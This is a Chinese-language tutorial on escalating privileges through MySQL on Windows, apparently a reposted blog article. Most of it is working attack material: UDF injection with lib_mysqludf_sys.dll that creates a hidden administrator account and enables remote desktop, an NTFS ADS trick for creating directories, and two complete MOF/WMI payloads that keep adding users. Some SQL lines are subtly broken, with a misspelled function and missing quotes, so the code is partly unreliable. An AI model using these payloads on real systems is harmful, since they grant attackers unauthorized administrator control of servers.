MySQL提权

1、利用sqlmap的UDF提权

  1.找个可写的目录上传lib_mysqludf_sys.dll,根据mysql的版本导入到windows\system32或者mysql的\lib\plugin目录下

select @@plugin_dir

 

select load_flie(C:\\RECYCLER\\lib_mysqludf_sys.dll) into dumpfile C:\\windows\\system32\\lib_mysqludf_sys.dll

 

 

  2.创建函数执行命令

create function cmd returns string soname lib_mysqludf_sys.dll;
select cmd(net user mrxt 123456 /add);
select cmd(net localgroup administrators mrxt /add);
select cmd(regedit /s C:\\3389.reg);    
drop function cmd;
delete from mysql.func where name=cmd

 

  

  3.某些情况下遇到Can‘t open shared library的情况,需要把DLL导出到lib\plugin目录下才可以,如果不存在,则可以用NTFS ADS流来创建文件夹的方法

select dll file into dumpfile C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\::$INDEX_ALLOCATION;
//创建lib目录

select dll file into dumpfile C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION;
//创建plugin目录

 

  

2.MOF提权

找个可写目录上传MOF文件,比如C:\RECYCLER\

这个payload利用的是WScript.Shell

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

 

这个payload利用的是User.Shell

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"Shell.Users\")\nz=WSH.create(\"NewUser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\")=3";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

 

然后导出到c:/windows/system32/wbem/mof/目录下

select load_file(C:\\wmpub\\nullevt.mof) into dumpfile c:\\windows\\system32\\wbem\\mof\\nullevt.mof

 

这个方法会不停的添加用户,执行net stop winmgmt 然后删除文件即可

 

 

参考文章:

http://www.waitalone.cn/mysql-tiquan-summary.html

http://zone.wooyun.org/content/1795

http://www.exploit-db.com/exploits/23083/

 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。